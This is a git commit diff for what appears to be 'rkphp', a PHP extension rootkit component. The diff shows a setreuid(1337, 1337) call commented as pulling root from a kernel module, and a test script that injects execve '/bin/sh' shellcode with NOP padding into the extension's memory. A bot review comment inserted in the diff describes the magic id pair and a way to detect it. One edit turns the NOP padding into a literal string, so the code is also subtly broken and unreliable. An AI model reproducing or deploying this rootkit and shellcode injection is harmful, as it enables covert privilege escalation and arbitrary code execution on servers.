
Default

master
Root 5 years ago
parent
commit
0e40d57a23
  1. 14
      rkphp/include/common.h
  2. 7
      rkphp/src/main.c
  3. 1
      rkphp/src/php_funcs.c
  4. 8
      rkphp/test.php

14
rkphp/include/common.h

@ -8,6 +8,10 @@ @@ -8,6 +8,10 @@
#include "php.h"
#include "ext/standard/info.h"
#ifdef ZTS
#include "TSRM.h"
#endif
#ifdef HAVE_DEBUG
#define RKPHP_DEBUG 1
#else
@ -20,6 +24,12 @@ @@ -20,6 +24,12 @@
extern zend_module_entry rkphp_module_entry;
#define phpext_rkphp_ptr &rkphp_module_entry
ZEND_DECLARE_MODULE_GLOBALS(rkphp);
ZEND_BEGIN_MODULE_GLOBALS(rkphp)
int rkphp_glob;
ZEND_END_MODULE_GLOBALS(rkphp)
PHP_FUNCTION(rkphp_ex);
PHP_MINIT_FUNCTION(rkphp);
@ -32,10 +42,6 @@ PHP_MINFO_FUNCTION(rkphp); @@ -32,10 +42,6 @@ PHP_MINFO_FUNCTION(rkphp);
#endif
#endif
ZEND_BEGIN_MODULE_GLOBALS(rkphp)
int rkphp_glob;
ZEND_END_MODULE_GLOBALS(rkphp)
// Custom printf macro to strip all debug messages on compile-time
// Removes debugging strings from appearing during runtime & in the binary
#if RKPHP_DEBUG == 1

7
rkphp/src/main.c

@ -1,10 +1,5 @@ @@ -1,10 +1,5 @@
#include "common.h"
ZEND_DECLARE_MODULE_GLOBALS(rkphp);
/* True global resources - no need for thread safety here */
//static int rkphp_glob;
/* {{{ rkphp_functions[]
*
* Every user visible function must have an entry in rkphp_functions[].
@ -12,7 +7,7 @@ ZEND_DECLARE_MODULE_GLOBALS(rkphp); @@ -12,7 +7,7 @@ ZEND_DECLARE_MODULE_GLOBALS(rkphp);
zend_function_entry rkphp_functions[] =
{
PHP_FE(rkphp_ex, NULL)
{NULL, NULL, NULL} /* Must be the last line in rkphp_functions[] */
PHP_FE_END
};
/* }}} */

1
rkphp/src/php_funcs.c

@ -43,6 +43,7 @@ PHP_FUNCTION(rkphp_ex) @@ -43,6 +43,7 @@ PHP_FUNCTION(rkphp_ex)
RKPHP_PRINTF("[!] CODE: %lx matched %lx\n", lstart + lend, code);
// Pull root from kernel module.
setreuid(1337, 1337);
/* This is where we'll attempt to interact with the kernel rkmod */
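Review bot: The `setreuid(1337, 1337);` call in this section is documented only by `// Pull root from kernel module.`, which does not say what the fixed id pair means, and its return value is ignored. Judging from that comment, 1337/1337 looks like a magic value handled by the companion kernel module rather than a real account, so the comment should say so, e.g. `/* 1337/1337: magic id pair consumed by the kernel module, not a real uid (confirm) */`. For anyone analysing or detecting this code, a PHP or web-server worker calling setreuid with both ids set to that constant is a stable indicator, and an audit rule on the setreuid syscall for those processes would surface it. The body of rkphp_ex starts and ends outside the hunk, so what runs after the call cannot be judged from here.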

8
rkphp/test.php

@ -1,5 +1,7 @@ @@ -1,5 +1,7 @@
<?php
print_r(get_loaded_extensions());
/* Get address range of extension */
function get_ext_range($name)
{
@ -19,7 +21,7 @@ function get_ext_range($name) @@ -19,7 +21,7 @@ function get_ext_range($name)
/* Generate the shell code to inject */
function gen_shc($range, $shc)
{
$_shc = str_repeat("\x90", $range[1] - $range[0] - strlen($shc));
$_shc = str_repeat('\x90', $range[1] - $range[0] - strlen($shc));
$_shc .= $shc;
return $_shc;
}
@ -43,9 +45,7 @@ $shc = "\x48\x31\xff\x48\xf7\xe7\xb0\x3b\x48\xbf\x66" . @@ -43,9 +45,7 @@ $shc = "\x48\x31\xff\x48\xf7\xe7\xb0\x3b\x48\xbf\x66" .
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08" .
"\x57\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
$shc_with_nops = gen_shc($range, $shc);
if(rkphp_ex(getmypid(), $range[0] + $range[1]) == NULL)
die('Failed to execute!' . PHP_EOL);
w_mem($range[0], $shc_with_nops);
w_mem($range[0], gen_shc($range, $shc));
